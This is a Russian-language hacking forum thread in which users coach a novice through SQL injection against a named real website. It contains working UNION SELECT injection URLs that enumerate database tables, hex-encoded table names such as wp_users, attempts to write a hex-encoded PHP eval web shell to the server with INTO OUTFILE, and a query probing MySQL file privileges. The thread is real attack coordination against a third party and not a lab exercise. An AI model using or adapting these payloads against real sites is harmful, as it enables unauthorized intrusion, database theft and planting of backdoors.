09.01.2012, 18:08
|
|
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
С нами:
8686406
Репутация:
265
|
|
Сообщение от faza02
где можно прочитать о выводе данных, если таблица в другой базе?
правильно я понял, мне это нужно?
union+select+1,2,table_schema+from+information_sch ema.tables+where+table_name=0x6162635f75736572
0x6162635f75736572 - подставь свой)
кодировать тут - http://x3k.ru/
wp_users будет - 0x77705f7573657273
потом пишешь в запросе: база.wp_users
|
|
|
09.01.2012, 19:26
|
|
Новичок
Регистрация: 06.01.2012
Сообщений: 14
С нами:
7552406
Репутация:
0
|
|
Шелл не заливается
Пробывал так:
http://www.vizborclub.com/vizborclub/photos_albom.php?id=-1%27+union+select+1,2,3,0x273c3f706870206576616c28 245f4745545b20186520195d29203f3e27+INTO+OUTFILE+'1 .php'+--+
http://www.vizborclub.com/vizborclub/photos_albom.php?id=-1%27+union+select+1,2,3,unhex(hex(0x273c3f70687020 6576616c28245f4745545b20186520195d29203f3e27))+INT O+OUTFILE+'1.php'+--+
http://www.vizborclub.com/vizborclub/photos_albom.php?id=-1%27+union+select+1,2,3,''+INTO+OUTFILE+'1.php'+--+
Очередной раз прошу помощи у старших. Поймите, ведь лучше запоминается когда на практике..
|
|
|
|
09.01.2012, 19:29
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
2York,
прав нет.
Сообщение от None
http://www.vizborclub.com/vizborclub/photos_albom.php?id=-1'+union+select+1,File_priv+from+mysql.user+where+ user='class63c_albosin'--+a
|
|
|
|
09.01.2012, 19:35
|
|
Новичок
Регистрация: 06.01.2012
Сообщений: 14
С нами:
7552406
Репутация:
0
|
|
Даже если я под админом зайду?
|
|
|
|
09.01.2012, 19:40
|
|
Новичок
Регистрация: 06.01.2012
Сообщений: 14
С нами:
7552406
Репутация:
0
|
|
А как я пойму что File_Prive=Y ? Содержимон страницы выведится?
|
|
|
|
09.01.2012, 19:47
|
|
Участник форума
Регистрация: 15.08.2010
Сообщений: 260
С нами:
8285366
Репутация:
62
|
|
Сообщение от York
А как я пойму что File_Prive=Y ? Содержимон страницы выведится?
да. или ошибку в случае если прав не хватит заглянуть в mysql.user
|
|
|
|
09.01.2012, 19:48
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Сообщение от York
Даже если я под админом зайду?
у тебя в бд нету файловых прав. Чтобы они появились в твоем случае - нужен скрипт, который обращается к бд под юзвером, у которого они есть (а я сомневаюсь, что ты найдешь такой скрипт). Д и под каким админом то ты решил зайти?
Зы. проще сначала понять что такое бд, и что за язык такой, через который идет обращение к ней. А уж потом приступать к практике (взлома).
|
|
|
|
09.01.2012, 19:58
|
|
Новичок
Регистрация: 06.01.2012
Сообщений: 14
С нами:
7552406
Репутация:
0
|
|
Литературку посоветуете более понятную для новичка?)
|
|
|
|
09.01.2012, 19:59
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от York
Литературку посоветуете более понятную для новичка?)
Я тебе уже давал литературу в этом посте /showpost.php?p=2971891&postcount=19143
P.S. google
|
|
|
|
09.01.2012, 21:01
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
а сам
Сообщение от None
'1.php'
должен быть в кавычках, и это никак не обойти? |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
